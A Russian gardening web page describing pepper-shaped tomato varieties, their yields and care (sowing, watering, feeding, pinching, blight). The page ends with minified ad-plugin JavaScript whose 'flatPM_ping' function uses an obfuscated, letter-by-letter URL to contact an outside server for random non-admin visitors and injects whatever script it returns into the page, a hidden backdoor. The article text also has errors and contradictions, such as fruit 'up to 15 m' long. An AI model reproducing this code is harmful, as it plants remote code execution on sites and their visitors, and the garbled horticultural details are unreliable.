О вкусе таких помидоров положительно отзываются все, кто сажал сорт. Для заготовок он не подходит, лучшее применение – в свежем виде и в салатах. Растения высокие, в укрытии достигают 2,2-2,4 метров. Кусты обязательно пасынкуют, ведут растения в два стебля, оставляя дополнительный пасынок.

НА ЗАМЕТКУ! Этот томат среднепоздний, поэтому в регионах с суровым климатом его выращивают только в теплицах.

На 1 кв. метре размещают по 2-3 куста. Отдает плоды долго, и что важно – к инфекциям томат стойкий.

Разнообразие оригиналов

В нашем обзоре приведены востребованные и известные дачникам сорта томатов с перцевидными плодами. Но список этот не окончательный, так как выведены и успешно выращиваются другие сорта этой группы.

Не так давно, в 2015 году, включен в Государственный реестр очень урожайный гибрид Петр Великий F1 (агрофирма «СеДек»), плоды которого идеально подходят для зимних заготовок (консервации, засолки).




Из кистевых томатов известен сорт Чухлома (урожайность до 6 кг с 1 кв. метра). В число популярных входят красивый индет Алый мустанг, среднеспелый Рома, а также оригинальный сорт Итальянские спагетти с малиновыми, вытянутой формы помидорками.

Для консервации не найти лучше сортов чем Аурия (красные томаты) и Эрос (оранжевые), а также великолепные Банановые ноги (плоды желтой окраски). Судя по отзывам, в свежем виде плоды этих сортов не так вкусны, но зато в консервации, засолке получаются просто великолепно.

Группа Перцевидных томатов включает в себя разные сорта, выращиваемые дачниками во всех регионах страны. Для областей с коротким летом подойдут томаты сибирских селекционеров, для юга – высокие индетерминантные помидоры, отлично плодоносящие в открытом грунте. Надеемся, что наш обзор позволит вам разобраться во всем многообразии, найти «свои» варианты и получить хороший урожай вкусных томатов!

Томат Перцевидный

Большинство из нас привыкло к тому, что томаты имеют округлую форму и красный цвет. Тогда как семейство данного овоща имеет многочисленные виды, которые обладают различной формой и цветами. Одним из таких ярких представителей является томат Перцевидный – он внешне и даже в разрезе напоминает сладкие перцы (отсюда и название).

Российский гибрид выведен сравнительно недавно (2001 год) путем скрещивания нескольких сортов, но основой является сорт Сливка.

Помидоры Перцевидные можно использовать как для консервирования, так и потреблять в свежем виде в салатах. Также из них получается отличный томатный сок.

Описание и характеристики

Обретший сравнительно недавно популярность, томат Перцевидный (описание и характеристики сорта будут представлены ниже) стал успешно выращиваться российскими садоводами. Сорт относят к высокорослым, так как максимальная высота куста достигает полутора метров, а то и выше. Поэтому взрослому растению требуется хорошая опора. Не забываем пасынковать, так как куст сильно ветвится. Опоры куст требует и по той причине, что имеет гигантские плоды, которые имеют оранжевый, желтый, красный или розовый окрасы, подобно перцам. Весьма интересно, с точки зрения эстетики, кулинарии, выглядит полосатый томат, как правило, красный с желтоватыми прожилками.

Закладывание первой кисти происходит где-то между 6 и 11 листом, следующие кисти располагаются каждые три листа. На каждой кисти вырастает до 7-8 мясистых со сладковатым привкусом, с небольшим количеством семечек крупных плодов удлиненной формы. Средний вес плода порядка 80 грамм при длине до 15 см. Вкупе с удлиненной формой это дает прекрасную возможность консервировать их целиком, не разрезая.

Сорт урожайный – с одного квадрата посадок можно собрать до 10 и больше кг. Относится к среднеспелым – от посадки до сбора первого урожая проходит порядка 110-115 суток. Плодоношение длится с середины июля до последних дней октября.

Сорт отличается морозоустойчивостью, поэтому можно выращивать не только в теплице, но и в открытом грунте. Этот сорт не только подарит плоды, но и украсит ваш сад своей необычностью. Кроме этого, за время практики томат показал прекрасное свойство – устойчивость практически ко всем заболеваниям томатов и вредителям.

Успешные виды томата

Перцевидные сорта томатов классифицируются на подвиды, но укажем здесь только прошедшие официальную регистрацию:

  • Сорт помидор Перцевидный.Зарегистрирован в 2001 году. Среднеспелый индетерминантный с хорошей урожайностью (до 8 кг в среднем). Плоды небольшого размера – 70-80 гр., но при хорошем уходе можно получить и стограммовые плоды. Обычно из них готовят фаршированные блюда, так как стенки плодов толстые и плотные;
  • Гигант.Сорт сибирской селекции. Название говорит само за себя – вес плодов – около 200 грамм, отмечены трехсотграммовые помидорины. При полном созревании плоды принимают насыщенно красный цвет. Вкус помидор сладкий;

Томат Перцевидный Гигант

  • Перцевидный желтый.Данный сорт появился в 2005 году. Также относится к индетерминантным и среднеспелым. Плоды небольшие, плотные, желтого цвета. Отличается сорт высокой устойчивостью к жаре и засухе;

Томат Перцевидный Желтый

  • Перцевидный оранжевый.Тоже в 2005 году селекционеры вывели данную разновидность. Индетерминантный, потому пасынкование и подвязка обязательны. В отличие от вышеописанного сорта, плоды Оранжевого достигают в среднем 150 грамм. Урожайность – более 9 кг с квадрата, это только в открытом грунте. При тепличном способе урожайность еще выше. Отличительной особенностью сорта является стойкость к недостатку освещения. Поэтому его можно высаживать и в полутени;

Томат Перцевидный Оранжевый

  • Красный Перцевидный. Сорт выведен совсем недавно – в 2015 году. Кроме цвета плодов от оранжевого сорта данный ничем не отличается. Разве что урожайность несколько выше, и цвет более традиционен для помидор;

  • Перцевидный малиновый. Также получен в 2015. Отличительная особенность сорта – он детерминантный, то есть высота куста не превышает метра. При этом отличается крупными плодами (до 250 грамм) и высокой урожайностью (в теплицах от него получают до 15 кг с квадрата). Раннеспелый сорт, время созревания – до 100 дней.

Агротехника

Первым делом готовим семена и грунт для рассады. Из-за того, что сорт относится к гибридным, самостоятельно семена приготовить не получится, их приобретаем только в магазине. Поэтому не стоит верить людям, говорящим, что они семена Перцевидного готовят сами. Помните, что от гибридов семена получить невозможно.

Минус в таком приобретении имеется – стоимость. Зато плюсов значительно больше: магазинные семена не требуют дополнительной обработки, и их всхожесть гарантирована агрокомпанией.

Грунт также рекомендуется брать в магазине. Но можно сэкономить и приготовить его самостоятельно. Для этого нужно:

  • 1 ведро хорошо перегнившего перегноя;
  • 1 литровая банка древесных опилок в полупревшем состоянии;
  • пол-литровая банка песка;
  • 1 ст.л. двойного суперфосфата в гранулах;
  • 3 ст. л. древесной золы.

Все это хорошенько нужно перемешать с ведром садовой земли. Грунт готов.

Его нужно разложить в приготовленные емкости, после чего можно высаживать семена. Высадка производится на глубину не более сантиметра. Емкости необходимо поместить в помещение, где соблюдается правильный температурный режим. В нашем случае в комнате нужно поддерживать +25 выше ноля. Сажать семена на рассаду следует в начале марта.

После того, как появятся два настоящих листка, рассаду можно пересадить по отдельным емкостям. В открытый грунт высадка производится в течение мая, в зависимости от региона и климата, это можно сделать в начале месяца или в конце.

Специалисты рекомендуют высаживать на один квадрат не более четырех ростков, в этом случае они будут чувствовать себя наиболее комфортно. Значит, дадут максимальный урожай.

Для посадок в открытом грунте нужно выбирать земли с нейтральной кислотностью или слабокислые. Снизить кислотность почвы можно при помощи известкования. Желательно предварительно внести в почву золу или перегной.

Лучшей почвой для Перцевидного являются суглинки, в которых корневая система растения прекрасно развивается.

Важно! Томаты нельзя высаживать после картофеля. Это родственные растения, и посадки помидоров не смогут получить из почвы необходимые вещества, так как картофель их уже «высосал». Да и о вредителях и болезнях не стоит забывать, несмотря на высокую стойкость томата к ним.

Несмотря на то, что томат Перцевидный не отличается высокой требовательностью к уходу, все же необходимо соблюдать простые, но от этого не менее важные рекомендации. Основные из них – это организация правильного полива и своевременное пасынкование.

Организация полива

От того, каким будет полив томата, зависит его урожайность. Интенсивность полива не зависит от цвета томата – что крепыш, что желтый требуют одинаковое количество воды. Из капризных в этом отношении можно выделить сорт «Кубинский».

Интенсивность зависит от высоты сорта. Низкорослые поливают четырежды в сезон:

  • Сразу же после высадки в грунт;
  • Второй раз через двадцать дней после первого полива;
  • Третий раз после цветения;
  • И в последний раз в конце июня.

Если же сорт относится к высокорослым видам, то полив осуществляется чуть чаще. Если сезон засушливый, то полив производится каждые три дня.

Помидоры усвоят воду намного лучше, если полив будет проводиться не сверху из лейки, а вода будет заливаться в траншею, которую нужно выкопать вдоль посадок. Таким образом, обеспечится доступ корней к влаге, и расход воды в разы уменьшится.

Внимание! Для полива рекомендуется брать настоянную родниковую или дождевую воду. Использование водопроводной или колодезной не рекомендуется. Также для полива не используется холодная вода, только комнатной или прогретой до температуры окружающей среды температуры.

Обычно через месяц после высадки образуются боковые корни. В это время рекомендуется подкормить росток куриным пометом или навозом. Во время цветения нужно внести в почву золу.

Если кусты будут сухими, то подкармливаем азотными удобрениями. Иногда случается так, что они излишне быстро набирают зеленую массу в ущерб плодоношению, тогда в помощь будут фосфаты.

Процедура пасынкования

При выращивании в открытом грунте томата Перцевидный особое внимание уделяем своевременному удалению пасынков.

Пасынки – это боковые отростки. Они вредны тем, что у основного стебля забирают полезные вещества и воду. Из-за этого садоводы не досчитываются немалой части урожая.

Пасынки нужно удалять вовремя. Опытные садоводы рекомендуют их удалять, пока они меньше 5 см. Можно и позднее, когда они станут гораздо длиннее, но чем длина удаляемого пасынка больше, тем больше стресса получит само растение. К тому же ранка будет больше, это может привести к гибели томата.

Важно! Некоторые садоводы вовсе не удаляют пасынки, но это неверно. Ведь в этом случае плодоношения томата практически не будет.

Процедуру пасынкования нужно проводить в солнечную погоду, в такую погоду ранки, нанесенные растению, будут затягиваться намного быстрее. Значит, растение быстрее и легче перенесет стресс.

Кроме этого нужно будет провести обрезку новых листьев, появляющихся с первыми цветами. Они, как и пасынки, забирают воду и микроэлементы, что опять приводит к снижению урожайности.

Заболевания и вредители

Перцевидный показывает отличную устойчивость к заболеваниям. Но фитофтороз может поразить посадки. Особенно, если посадки растут при высокой влажности и невысокой температуре.

Лечение проводят фунгицидными препаратами. Профилактика от недуга следующая – посадки осуществляем в хорошо проветриваемых солнечных местах, они не должны быть загущенными.

Преимущества и недостатки сорта

Достоинства следующие:

  • Прекрасный вкус;
  • Хорошая урожайность;
  • Сорт относится к универсальным, его можно выращивать как в тепличных условиях, так в открытом грунте;
  • Плод имеет оригинальную форму, что очень импонирует многим садоводам;
  • Плод томата мясистый с рассыпчатой мякотью и слегка сладковатым вкусом;
  • Плоды можно подвергать консервации, употреблять в свежем, варенном и печеном виде.

Не обходится и без недостатков:

  • По мере роста требуется установка шпалер;
  • Индетерминантные сорта нужно постоянно подвязывать;
  • Стоимость семян;
  • Невозможность самостоятельной заготовки семян.

Завершая рассказ о необычном сорте Перцевидных томатов, стоит отметить, что, несмотря на достаточно крупные плоды необычной формы, благодаря которой томаты и получили свое название, описанный выше гибрид достаточно капризен в уходе, требователен к почвам.

Сорта Перцевидного томата

В отличие от привычных круглых помидоров томат Перцевидный привлекает внимание огородников, любящих эксперименты, оригинальной формой. Большинство разновидностей подобного томата было выведено иностранной селекцией, но есть и отечественные варианты.

Особенности

Свое название сорт получил за перцевидное строение и схожий с перцем внешний вид.

Просмотр описания Перцевидного помидора позволяет отнести эту разновидность овощной культуры к индетерминантным растениям. Средняя высота, на которую вырастают Перцевидные томатные кусты, — 1,5-2 м. Овощи достигают размеров до 15 м. В описании помидоров перечисляются различные окраски овощей. Они могут быть красного, яркого желтого либо оранжевого оттенка. В природе встречается даже Перцевидный полосатый томат. Вес каждого овоща варьируется в пределах 50-80 г.

Преимущества

По качественным характеристикам Перцевидный помидор отличается повышенной мясистостью и почти не содержит семян в мякоти. У гибридных сортов есть ряд преимуществ:

  • высокие показатели урожайности,
  • равномерность созревания,
  • устойчивость к основным видам болезней и вредителям.

Среди основных минусов дачники отмечают высокую цену семян, которые невозможно собрать собственными силами и приходится покупать на каждый очередной садово-огороднический сезон.

Показатели урожайности

Большинство разновидностей относятся к среднеспелым, которые созревают в среднем за 110-115 суток после первых появившихся на грядке всходов. Первые плоды Перцевидный помидор приносит не ранее середины лета. Последний урожай дачники собирают обычно к осени. Увеличить срок плодоношения возможно при выращивании сортов в тепличных условиях.

Как отмечают огородники, для гибрида важно не пропустить прищипывание верхушки томатного куста, которое проводят в августе, иначе вновь появившиеся цветки замедлят процесс плодоношения.

Общая характеристика урожайности гибридной разновидности насчитывает от 6 до 10 овощей с каждой помидорной кисти. Даже неопытный дачник способен получить не менее ведра помидоров, а иногда и до 9 кг овощей с 1 м посевной площади.

Наиболее известные сорта

Сегодня известны многие Перцевидные сорта томатов, успешно выращивающиеся рядовыми дачниками на приусадебных участках.

Желтый

Жёлтый Перцевидный помидор известен с 2005 года. Он зарекомендовал себя, благодаря отличным вкусовым качествам и яркому желтому цвету. Среди плюсов разновидности отмечаю повышенные показатели устойчивости к жаркому климату и засухе.

Среди жёлтых представителей наиболее известны:

  • желтый вид Римская свечка,
  • Мидас желтый,
  • Золотой клык.

Оранжевый

Оранжевый вид приносит овощи большего размера, чем желтая разновидность. Его плоды достигают веса в 135-160 г, что дает возможность собирать с 1 кв. м посевной площади до 9 кг урожая. Наиболее часто этот гибрид выращивается в открытом грунте регионов средней полосы России. Среди оранжевых представителей популярностью пользуется полосатый вид.

Традиционный красный

Классический красный Перцевидный томат, выведенный компанией Аэлита, во многом схож по характеристикам с оранжевым, в некоторых случаях превышая последний в урожайности. Среди красных гибридов отмечают:

  • Алый мустанг,
  • Банановый красный помидор,
  • Рома,
  • Петр Великий.

Кубинский

Кубинский черный помидор выделяется поздним сроком созревания и высокорослостью, достигая высоту в 3 м при выращивании в теплице. При выращивании с формированием куста в 2 стебля кубинский черный может показывать урожайность по 10-12 кг. Средний вес овощей — от 200 до 350 г.

Сибирский

Гибрид помидоров необычной формы под названием сибирский Казак плодоносит довольно крупными плодами — по 200-300 г каждый. Высокорослый куст может вырастать до 1,8 м. Повысить урожайность вида Сибирский возможно путем формирования кустов в 2-3 стебля с загрузкой на 1 кв. м не более 3 единиц.

Розовый

Розовый гибрид хорош для выращивания в южных регионах на открытом грунте либо в парнике. Плоды розового помидора выделяются удлиненным суженным окончанием весом по 80-120 г с высокими вкусовыми характеристиками. Среди наиболее популярных — Розовый крепыш.

Малиновый

Малиновый детерминант появился в садах новосибирских селекционеров и стал известен, благодаря заявленной урожайности в 12-15 кг с 1 кв. м грядок. По сахаристости малиновый вид помидоров способен соперничать с известным Бычьим сердцем.

Тонкости выращивания

Гибридные сорта томатов выращивают в теплице не семенами, а рассадным методом. Плюсом этой разновидности овощной культуры является то, что приобретаемые семена уже подготовлены к посадке и не требуют дополнительной обработки, показывая хорошую всхожесть.

Посев

Среди основных условий посева семенами гибридного томата выделяют соблюдение необходимого температурного режима на уровне не менее 25°С. Глубина, на которую рекомендуется сеять в теплице семенной материал, — не более 1 см.

Пикировка

Процедура пикировки Перцевидных сортов мало чем отличается от используемой для традиционных томатов. Ее проводят при появлении на ростках 2 листьев. Перцевидный помидор пересаживают в открытый грунт в мае с соблюдением частоты посадки не больше 4 саженцев на 1 кв. м посевной площади.

Дальнейший уход

Уход за сортами Перцевидных томатов предполагает правильный полив, удобрение и пасынкование томатных кустов, что непременно сказывается на урожае овощей.

Полив

Поливать томаты требуется по правилам, в зависимости от сорта:

  • для низкорослых разновидностей, которые охватывают штамбовые виды, полив производится сразу после пересадки рассады в открытый грунт с повтором спустя 20 суток, далее — после цветения и затем — в конце июня,
  • для высокорослых видов требуется более частый полив: в засушливые периоды — не менее 3 раз в неделю, в некоторых случаях огородники выкапывают возле грядки траншею, куда периодически заливается вода.

Удобрение

Удобрять Перцевидные томаты рекомендуется навозом либо внесением куриного помета. Прикормку делают по прошествии 1 месяца после посадки рассады в открытый грунт, когда растение пускает боковые корни.

Если листва томатов выглядит сухой, вносят азотосодержащие удобряющие комплексы. Если Перцевидные помидоры слишком активно набирают массу, им недостает фосфатных прикормок.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};